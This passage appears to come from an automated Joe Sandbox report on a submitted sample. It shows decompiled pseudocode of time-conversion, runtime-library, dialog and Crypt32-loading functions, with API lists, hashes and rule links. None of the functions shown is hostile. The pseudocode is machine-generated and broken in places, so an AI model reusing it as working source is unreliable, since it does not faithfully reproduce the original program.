				_v44.wSecond =  *_t11;
				_v44.wMilliseconds = 0;
				_v44.wDayOfWeek = 0;
				if(SystemTimeToFileTime( &_v44,  &_v20) == 0) {
					 *_t76 = 0;
					 *((intOrPtr*)(_t76 + 4)) = 0;
				} else {
					if(E00BAAC35() >= 0x600) {
						FileTimeToSystemTime( &_v20,  &_v60);
						__imp__TzSpecificLocalTimeToSystemTime(0,  &_v60,  &_v76);
						SystemTimeToFileTime( &_v76,  &_v12);
						SystemTimeToFileTime( &_v60,  &_v28);
						_t61 = _v12.dwHighDateTime + _v20.dwHighDateTime;
						asm("sbb eax, [ebp-0x14]");
						asm("sbb eax, edi");
						asm("adc eax, edi");
						_t72 = 0 - _v28.dwLowDateTime + _v12.dwLowDateTime + _v20.dwLowDateTime;
						asm("adc eax, edi");
					} else {
						LocalFileTimeToFileTime( &_v20,  &_v12);
						_t61 = _v12.dwHighDateTime;
						_t72 = _v12.dwLowDateTime;
					}
					 *_t76 = E00BBE620(_t72, _t61, 0x64, 0);
					 *((intOrPtr*)(_t76 + 4)) = _t73;
				}
				_t36 = _t66 + 0x18; // 0x66d84589
				_t47 =  *_t36;
				 *_t76 =  *_t76 + _t47;
				asm("adc [esi+0x4], edi");
				return _t47;
			}

0x00bb0c1e
0x00bb0c25
0x00bb0c2a
0x00bb0c2f
0x00bb0c33
0x00bb0c37
0x00bb0c3b
0x00bb0c3f
0x00bb0c43
0x00bb0c47
0x00bb0c4b
0x00bb0c4f
0x00bb0c53
0x00bb0c57
0x00bb0c5d
0x00bb0c61
0x00bb0c75
0x00bb0d07
0x00bb0d09
0x00bb0c7b
0x00bb0c87
0x00bb0ca7
0x00bb0cb6
0x00bb0cc4
0x00bb0cd2
0x00bb0cdd
0x00bb0ce2
0x00bb0ce8
0x00bb0ced
0x00bb0cef
0x00bb0cf2
0x00bb0c89
0x00bb0c91
0x00bb0c97
0x00bb0c9a
0x00bb0c9a
0x00bb0cfe
0x00bb0d00
0x00bb0d00
0x00bb0d0c
0x00bb0d0c
0x00bb0d0f
0x00bb0d11
0x00bb0d1a

APIs

SystemTimeToFileTime.KERNEL32(?,?), ref: 00BB0C6D

Part of subcall function 00BAAC35: GetVersionExW.KERNEL32(?), ref: 00BAAC5A

LocalFileTimeToFileTime.KERNEL32(?,00BB0C18), ref: 00BB0C91
FileTimeToSystemTime.KERNEL32(?,?), ref: 00BB0CA7
TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 00BB0CB6
SystemTimeToFileTime.KERNEL32(?,00BB0C18), ref: 00BB0CC4
SystemTimeToFileTime.KERNEL32(?,?), ref: 00BB0CD2

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID: Time$File$System$Local$SpecificVersion
String ID:
API String ID: 2092733347-0
Opcode ID: 2d8aadff1c512c1ec8afaacbc36360ef9f389e92795745372ab8a4fd5970a861
Instruction ID: 8224bb5ad65c8bed2836bdafcced0de59e89445758010694e5e490abe715c073
Opcode Fuzzy Hash: 2d8aadff1c512c1ec8afaacbc36360ef9f389e92795745372ab8a4fd5970a861
Instruction Fuzzy Hash: E331E87A90024AEBCB00EFE4D8959EFFBBCFF58700B04456AE915E3210EB309945CB65

Uniqueness

Uniqueness Score: -1.00%

Function 00BB9110 Relevance: 9.1, APIs: 6, Instructions: 89
COMMON

Download Yara Rule

C-Code - Quality: 81%

			E00BB9110(signed int _a4, intOrPtr _a8, signed int* _a12) {
				void* _t17;
				signed int _t23;
				void* _t26;
				signed int _t32;
				signed int* _t36;

				_t36 = _a12;
				if(_t36 != 0) {
					_t34 = _a8;
					_t26 = 0x10;
					if(E00BBFC4A(_a8, 0xbd438c, _t26) == 0) {
						L13:
						_t32 = _a4;
						 *_t36 = _t32;
						L14:
						 *0xbd2260(_t32);
						 *((intOrPtr*)( *((intOrPtr*)( *_t32 + 4))))();
						_t17 = 0;
						L16:
						return _t17;
					}
					if(E00BBFC4A(_t34, 0xbd43cc, _t26) != 0) {
						if(E00BBFC4A(_t34, 0xbd43ac, _t26) != 0) {
							if(E00BBFC4A(_t34, 0xbd437c, _t26) != 0) {
								if(E00BBFC4A(_t34, 0xbd441c, _t26) != 0) {
									if(E00BBFC4A(_t34, 0xbd436c, _t26) != 0) {
										 *_t36 =  *_t36 & 0x00000000;
										_t17 = 0x80004002;
										goto L16;
									}
									goto L13;
								}
								_t32 = _a4;
								_t23 = _t32 + 0x10;
								L11:
								asm("sbb ecx, ecx");
								 *_t36 =  ~_t32 & _t23;
								goto L14;
							}
							_t32 = _a4;
							_t23 = _t32 + 0xc;
							goto L11;
						}
						_t32 = _a4;
						_t23 = _t32 + 8;
						goto L11;
					}
					_t32 = _a4;
					_t23 = _t32 + 4;
					goto L11;
				}
				return 0x80004003;
			}

0x00bb9114
0x00bb9119
0x00bb9127
0x00bb912c
0x00bb913e
0x00bb91cd
0x00bb91cd
0x00bb91d0
0x00bb91d2
0x00bb91da
0x00bb91e0
0x00bb91e2
0x00bb91ee
0x00000000
0x00bb91ef
0x00bb9155
0x00bb9170
0x00bb918b
0x00bb91a6
0x00bb91cb
0x00bb91e6
0x00bb91e9
0x00000000
0x00bb91e9
0x00000000
0x00bb91cb
0x00bb91a8
0x00bb91ab
0x00bb91ae
0x00bb91b2
0x00bb91b6
0x00000000
0x00bb91b6
0x00bb918d
0x00bb9190
0x00000000
0x00bb9190
0x00bb9172
0x00bb9175
0x00000000
0x00bb9175
0x00bb9157
0x00bb915a
0x00000000
0x00bb915a
0x00000000

APIs

_memcmp.LIBVCRUNTIME ref: 00BB9134
_memcmp.LIBVCRUNTIME ref: 00BB914B

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: e5b3f694184aaa98849001f4bf9a3b1aa6de3d95a11818669013e9f1506277a3
Instruction ID: 9a84865397979d24589993aec1250a0fde881c1fb272d4fcccade29cc11f6d45
Opcode Fuzzy Hash: e5b3f694184aaa98849001f4bf9a3b1aa6de3d95a11818669013e9f1506277a3
Instruction Fuzzy Hash: 6521A17160410FBBD7089E19CC85FBBBBEDEB54754B1081A9FD08AB211F7B0DD41A690

Uniqueness

Uniqueness Score: -1.00%

Function 00BC8E25 Relevance: 9.0, APIs: 6, Instructions: 50
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 72%

			E00BC8E25(void* __ebx, void* __ecx, void* __edx) {
				void* __edi;
				void* __esi;
				intOrPtr _t2;
				void* _t3;
				void* _t4;
				intOrPtr _t9;
				void* _t11;
				void* _t20;
				void* _t21;
				void* _t23;
				void* _t25;
				void* _t27;
				void* _t29;
				void* _t31;
				void* _t32;
				long _t36;
				long _t37;
				void* _t40;

				_t29 = __edx;
				_t23 = __ecx;
				_t20 = __ebx;
				_t36 = GetLastError();
				_t2 =  *0xbdd6ac; // 0x6
				_t42 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L2:
					_t3 = E00BC8429(_t23, 1, 0x364);
					_t31 = _t3;
					_pop(_t25);
					if(_t31 != 0) {
						_t4 = E00BCA4F1(_t25, _t36, __eflags,  *0xbdd6ac, _t31);
						__eflags = _t4;
						if(_t4 != 0) {
							E00BC8C96(_t25, _t31, 0xc00288);
							E00BC835E(0);
							_t40 = _t40 + 0xc;
							__eflags = _t31;
							if(_t31 == 0) {
								goto L9;
							} else {
								goto L8;
							}
						} else {
							_push(_t31);
							goto L4;
						}
					} else {
						_push(_t3);
						L4:
						E00BC835E();
						_pop(_t25);
						L9:
						SetLastError(_t36);
						E00BC83E6(_t20, _t29, _t31, _t36);
						asm("int3");
						_push(_t20);
						_push(_t36);
						_push(_t31);
						_t37 = GetLastError();
						_t21 = 0;
						_t9 =  *0xbdd6ac; // 0x6
						_t45 = _t9 - 0xffffffff;
						if(_t9 == 0xffffffff) {
							L12:
							_t32 = E00BC8429(_t25, 1, 0x364);
							_pop(_t27);
							if(_t32 != 0) {
								_t11 = E00BCA4F1(_t27, _t37, __eflags,  *0xbdd6ac, _t32);
								__eflags = _t11;
								if(_t11 != 0) {
									E00BC8C96(_t27, _t32, 0xc00288);
									E00BC835E(_t21);
									__eflags = _t32;
									if(_t32 != 0) {
										goto L19;
									} else {
										goto L18;
									}
								} else {
									_push(_t32);
									goto L14;
								}
							} else {
								_push(_t21);
								L14:
								E00BC835E();
								L18:
								SetLastError(_t37);
							}
						} else {
							_t32 = E00BCA49B(_t25, _t37, _t45, _t9);
							if(_t32 != 0) {
								L19:
								SetLastError(_t37);
								_t21 = _t32;
							} else {
								goto L12;
							}
						}
						return _t21;
					}
				} else {
					_t31 = E00BCA49B(_t23, _t36, _t42, _t2);
					if(_t31 != 0) {
						L8:
						SetLastError(_t36);
						return _t31;
					} else {
						goto L2;
					}
				}
			}

0x00bc8e25
0x00bc8e25
0x00bc8e25
0x00bc8e2f
0x00bc8e31
0x00bc8e36
0x00bc8e39
0x00bc8e47
0x00bc8e4e
0x00bc8e53
0x00bc8e56
0x00bc8e59
0x00bc8e6b
0x00bc8e70
0x00bc8e72
0x00bc8e7d
0x00bc8e84
0x00bc8e89
0x00bc8e8c
0x00bc8e8e
0x00000000
0x00000000
0x00000000
0x00000000
0x00bc8e74
0x00bc8e74
0x00000000
0x00bc8e74
0x00bc8e5b
0x00bc8e5b
0x00bc8e5c
0x00bc8e5c
0x00bc8e61
0x00bc8e9c
0x00bc8e9d
0x00bc8ea3
0x00bc8ea8
0x00bc8eab
0x00bc8eac
0x00bc8ead
0x00bc8eb4
0x00bc8eb6
0x00bc8eb8
0x00bc8ebd
0x00bc8ec0
0x00bc8ece
0x00bc8eda
0x00bc8edd
0x00bc8ee0
0x00bc8ef2
0x00bc8ef7
0x00bc8ef9
0x00bc8f04
0x00bc8f0a
0x00bc8f12
0x00bc8f14
0x00000000
0x00000000
0x00000000
0x00000000
0x00bc8efb
0x00bc8efb
0x00000000
0x00bc8efb
0x00bc8ee2
0x00bc8ee2
0x00bc8ee3
0x00bc8ee3
0x00bc8f16
0x00bc8f17
0x00bc8f17
0x00bc8ec2
0x00bc8ec8
0x00bc8ecc
0x00bc8f1f
0x00bc8f20
0x00bc8f26
0x00000000
0x00000000
0x00000000
0x00bc8ecc
0x00bc8f2d
0x00bc8f2d
0x00bc8e3b
0x00bc8e41
0x00bc8e45
0x00bc8e90
0x00bc8e91
0x00bc8e9b
0x00000000
0x00000000
0x00000000
0x00bc8e45

APIs

GetLastError.KERNEL32(?,00BDFF50,00BC3C54,00BDFF50,?,?,00BC36CF,?,?,00BDFF50), ref: 00BC8E29
_free.LIBCMT ref: 00BC8E5C
_free.LIBCMT ref: 00BC8E84
SetLastError.KERNEL32(00000000,?,00BDFF50), ref: 00BC8E91
SetLastError.KERNEL32(00000000,?,00BDFF50), ref: 00BC8E9D
_abort.LIBCMT ref: 00BC8EA3

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: 51d31da5cc8caf21a5d8400ea184cbdde603d9645e1dc9bfc81dd12e9f11df12
Instruction ID: 7530b93d21f6d3c1e60c2d815140e438d5831681b17cf15106d10e3bbc526a10
Opcode Fuzzy Hash: 51d31da5cc8caf21a5d8400ea184cbdde603d9645e1dc9bfc81dd12e9f11df12
Instruction Fuzzy Hash: 4AF0283610670226C2163334BC5AF5B27E9DBC1B21F2601ADF62DA32D1FE608C0281A5

Uniqueness

Uniqueness Score: -1.00%

Function 00BBCB10 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 56
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E00BBCB10(void* __eflags, struct HWND__* _a4, intOrPtr _a8, signed short _a12, WCHAR* _a16) {
				void* _t12;
				WCHAR* _t16;
				void* _t17;
				intOrPtr _t18;
				void* _t19;
				struct HWND__* _t21;
				signed short _t22;

				_t16 = _a16;
				_t22 = _a12;
				_t21 = _a4;
				_t18 = _a8;
				if(E00BA130B(_t17, _t21, _t18, _t22, _t16, L"RENAMEDLG", 0, 0) != 0) {
					L10:
					return 1;
				}
				_t19 = _t18 - 0x110;
				if(_t19 == 0) {
					 *0xbfdca4 = _t16;
					SetDlgItemTextW(_t21, 0x66, _t16);
					SetDlgItemTextW(_t21, 0x68,  *0xbfdca4);
					goto L10;
				}
				if(_t19 != 1) {
					L5:
					return 0;
				}
				_t12 = (_t22 & 0x0000ffff) - 1;
				if(_t12 == 0) {
					GetDlgItemTextW(_t21, 0x68,  *0xbfdca4, 0x800);
					_push(1);
					L7:
					EndDialog(_t21, ??);
					goto L10;
				}
				if(_t12 == 1) {
					_push(0);
					goto L7;
				}
				goto L5;
			}

0x00bbcb11
0x00bbcb16
0x00bbcb1b
0x00bbcb20
0x00bbcb38
0x00bbcb9a
0x00000000
0x00bbcb9c
0x00bbcb3a
0x00bbcb40
0x00bbcb7f
0x00bbcb85
0x00bbcb94
0x00000000
0x00bbcb94
0x00bbcb45
0x00bbcb54
0x00000000
0x00bbcb54
0x00bbcb4a
0x00bbcb4d
0x00bbcb71
0x00bbcb77
0x00bbcb5a
0x00bbcb5b
0x00000000
0x00bbcb5b
0x00bbcb52
0x00bbcb58
0x00000000
0x00bbcb58
0x00000000

APIs

Part of subcall function 00BA130B: GetDlgItem.USER32(00000000,00003021), ref: 00BA134F
Part of subcall function 00BA130B: SetWindowTextW.USER32(00000000,00BD25B4), ref: 00BA1365

EndDialog.USER32(?,00000001), ref: 00BBCB5B
GetDlgItemTextW.USER32(?,00000068,00000800), ref: 00BBCB71
SetDlgItemTextW.USER32(?,00000066,?), ref: 00BBCB85
SetDlgItemTextW.USER32(?,00000068), ref: 00BBCB94

Strings

RENAMEDLG, xrefs: 00BBCB28

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID: ItemText$DialogWindow
String ID: RENAMEDLG
API String ID: 445417207-3299779563
Opcode ID: b7b4a2bc2f90f31f26b6743d7fd92734c49978610ae3e16dc06b853f46fbf921
Instruction ID: e9f4a54ae5597ee3a380fa9fe235b75ec285e8b237daf035b4342529eb9f2136
Opcode Fuzzy Hash: b7b4a2bc2f90f31f26b6743d7fd92734c49978610ae3e16dc06b853f46fbf921
Instruction Fuzzy Hash: D701F5322853187BE6209B649D4AFBFBFEDEB5AB02F140451F342A7090C6E19904C775

Uniqueness

Uniqueness Score: -1.00%

Function 00BC73E8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00BC7399,?,?,00BC7339,?,00BDAAB8,0000000C,00BC7490,?,00000002), ref: 00BC7408
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00BC741B
FreeLibrary.KERNEL32(00000000,?,?,?,00BC7399,?,?,00BC7339,?,00BDAAB8,0000000C,00BC7490,?,00000002,00000000), ref: 00BC743E

Strings

mscoree.dll, xrefs: 00BC7401
CorExitProcess, xrefs: 00BC7413

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 32759c77d2fbc3d57cccb364aa568db28c7807ba81f147b5fddc86e95f54d411
Instruction ID: 8f8677eef96e2361d9eff3b211735d0ba8cf5983f3aa471a9d0cf42b569d7cac
Opcode Fuzzy Hash: 32759c77d2fbc3d57cccb364aa568db28c7807ba81f147b5fddc86e95f54d411
Instruction Fuzzy Hash: 07F04431645219BBCB195FA4DC19BAEFFF8EB04715F0040DAF809A3260EF708D40DA90

Uniqueness

Uniqueness Score: -1.00%

Function 00BAEAB3 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 20
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00BAEAB3(struct HINSTANCE__** __ecx) {
				void* _t5;
				struct HINSTANCE__* _t6;
				struct HINSTANCE__** _t9;

				_t9 = __ecx;
				if(__ecx[1] == 0) {
					_t6 = E00BAFFE3(L"Crypt32.dll");
					 *__ecx = _t6;
					if(_t6 != 0) {
						_t9[2] = GetProcAddress(_t6, "CryptProtectMemory");
						_t6 = GetProcAddress( *_t9, "CryptUnprotectMemory");
						_t9[3] = _t6;
					}
					_t9[1] = 1;
					return _t6;
				}
				return _t5;
			}

0x00baeab4
0x00baeaba
0x00baeac1
0x00baeac6
0x00baeaca
0x00baeadf
0x00baeae2
0x00baeae8
0x00baeae8
0x00baeaeb
0x00000000
0x00baeaeb
0x00baeaf0

APIs

Part of subcall function 00BAFFE3: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00BAFFFE
Part of subcall function 00BAFFE3: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00BAEAC6,Crypt32.dll,00000000,00BAEB4A,?,?,00BAEB2C,?,?,?), ref: 00BB0020

GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00BAEAD2
GetProcAddress.KERNEL32(00BE71C0,CryptUnprotectMemory), ref: 00BAEAE2

Strings

CryptProtectMemory, xrefs: 00BAEACC
Crypt32.dll, xrefs: 00BAEABC
CryptUnprotectMemory, xrefs: 00BAEAD8

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID: AddressProc$DirectoryLibraryLoadSystem
String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
API String ID: 2141747552-1753850145
Opcode ID: 73774a8a3347763d396e5c7f1a1943442881077f5c52f335ab48711399a8b44d
Instruction ID: 521f6f32ef6854df924f587f00acf0c45e69679ceecfcff9024aa9760ee0ddd5
Opcode Fuzzy Hash: 73774a8a3347763d396e5c7f1a1943442881077f5c52f335ab48711399a8b44d
Instruction Fuzzy Hash: 6FE01A748057929EC7255B64D829A46FBE4AB25714F0488ABB495D3250EAB8D4408B60

Uniqueness

Uniqueness Score: -1.00%

Function 00BC7C09 Relevance: 7.6, APIs: 5, Instructions: 129
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 83%

			E00BC7C09(signed int* __ecx, signed int __edx) {
				signed int _v8;
				intOrPtr* _v12;
				signed int _v16;
				signed int _t28;
				signed int _t29;
				intOrPtr _t33;
				signed int _t37;
				signed int _t38;
				signed int _t40;
				void* _t50;
				signed int _t56;
				intOrPtr* _t57;
				signed int _t68;
				signed int _t71;
				signed int _t72;
				signed int _t74;
				signed int _t75;
				signed int _t78;
				signed int _t80;
				signed int* _t81;
				signed int _t85;
				void* _t86;

				_t72 = __edx;
				_v12 = __ecx;
				_t28 =  *__ecx;
				_t81 =  *_t28;
				if(_t81 != 0) {
					_t29 =  *0xbdd668; // 0xb57946a0
					_t56 =  *_t81 ^ _t29;
					_t78 = _t81[1] ^ _t29;
					_t83 = _t81[2] ^ _t29;
					asm("ror edi, cl");
					asm("ror esi, cl");
					asm("ror ebx, cl");
					if(_t78 != _t83) {
						L14:
						 *_t78 = E00BC7F3C( *((intOrPtr*)( *((intOrPtr*)(_v12 + 4)))));
						_t33 = E00BC2F99(_t56);
						_t57 = _v12;
						 *((intOrPtr*)( *((intOrPtr*)( *_t57)))) = _t33;
						_t24 = _t78 + 4; // 0x4
						 *((intOrPtr*)( *((intOrPtr*)( *_t57)) + 4)) = E00BC2F99(_t24);
						 *((intOrPtr*)( *((intOrPtr*)( *_t57)) + 8)) = E00BC2F99(_t83);
						_t37 = 0;
						L15:
						return _t37;
					}
					_t38 = 0x200;
					_t85 = _t83 - _t56 >> 2;
					if(_t85 <= 0x200) {
						_t38 = _t85;
					}
					_t80 = _t38 + _t85;
					if(_t80 == 0) {
						_t80 = 0x20;
					}
					if(_t80 < _t85) {
						L9:
						_push(4);
						_t80 = _t85 + 4;
						_push(_t80);
						_v8 = E00BCB593(_t56);
						_t40 = E00BC835E(0);
						_t68 = _v8;
						_t86 = _t86 + 0x10;
						if(_t68 != 0) {
							goto L11;
						}
						_t37 = _t40 | 0xffffffff;
						goto L15;
					} else {
						_push(4);
						_push(_t80);
						_v8 = E00BCB593(_t56);
						E00BC835E(0);
						_t68 = _v8;
						_t86 = _t86 + 0x10;
						if(_t68 != 0) {
							L11:
							_t56 = _t68;
							_v8 = _t68 + _t85 * 4;
							_t83 = _t68 + _t80 * 4;
							_t78 = _v8;
							_push(0x20);
							asm("ror eax, cl");
							_t71 = _t78;
							_v16 = 0 ^  *0xbdd668;
							asm("sbb edx, edx");
							_t74 =  !_t72 & _t68 + _t80 * 0x00000004 - _t78 + 0x00000003 >> 0x00000002;
							_v8 = _t74;
							if(_t74 == 0) {
								goto L14;
							}
							_t75 = _v16;
							_t50 = 0;
							do {
								_t50 = _t50 + 1;
								 *_t71 = _t75;
								_t71 = _t71 + 4;
							} while (_t50 != _v8);
							goto L14;
						}
						goto L9;
					}
				}
				return _t28 | 0xffffffff;
			}

0x00bc7c09
0x00bc7c13
0x00bc7c17
0x00bc7c19
0x00bc7c1d
0x00bc7c27
0x00bc7c38
0x00bc7c3d
0x00bc7c3f
0x00bc7c41
0x00bc7c43
0x00bc7c45
0x00bc7c49
0x00bc7d03
0x00bc7d11
0x00bc7d13
0x00bc7d18
0x00bc7d1f
0x00bc7d21
0x00bc7d2f
0x00bc7d3e
0x00bc7d41
0x00bc7d43
0x00000000
0x00bc7d44
0x00bc7c51
0x00bc7c56
0x00bc7c5b
0x00bc7c5d
0x00bc7c5d
0x00bc7c5f
0x00bc7c64
0x00bc7c68
0x00bc7c68
0x00bc7c6b
0x00bc7c8a
0x00bc7c8a
0x00bc7c8c
0x00bc7c8f
0x00bc7c98
0x00bc7c9b
0x00bc7ca0
0x00bc7ca3
0x00bc7ca8
0x00000000
0x00000000
0x00bc7caa
0x00000000
0x00bc7c6d
0x00bc7c6d
0x00bc7c6f
0x00bc7c78
0x00bc7c7b
0x00bc7c80
0x00bc7c83
0x00bc7c88
0x00bc7cb2
0x00bc7cb5
0x00bc7cb7
0x00bc7cba
0x00bc7cc2
0x00bc7cc8
0x00bc7ccf
0x00bc7cd1
0x00bc7cd9
0x00bc7ce8
0x00bc7cec
0x00bc7cee
0x00bc7cf1
0x00000000
0x00000000
0x00bc7cf3
0x00bc7cf6
0x00bc7cf8
0x00bc7cf8
0x00bc7cf9
0x00bc7cfb
0x00bc7cfe
0x00000000
0x00bc7cf8
0x00000000
0x00bc7c88
0x00bc7c6b
0x00000000

APIs

_free.LIBCMT ref: 00BC7C7B
_free.LIBCMT ref: 00BC7C9B

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 971bf1428a6d8b29bbba853e28cab2bfb69d99166ef52f1425d9a14f6c2e0124
Instruction ID: d132b6c33b604c2dec02f8dba4f0f87f6f8cb80db3c58eba225605fe85d157b3
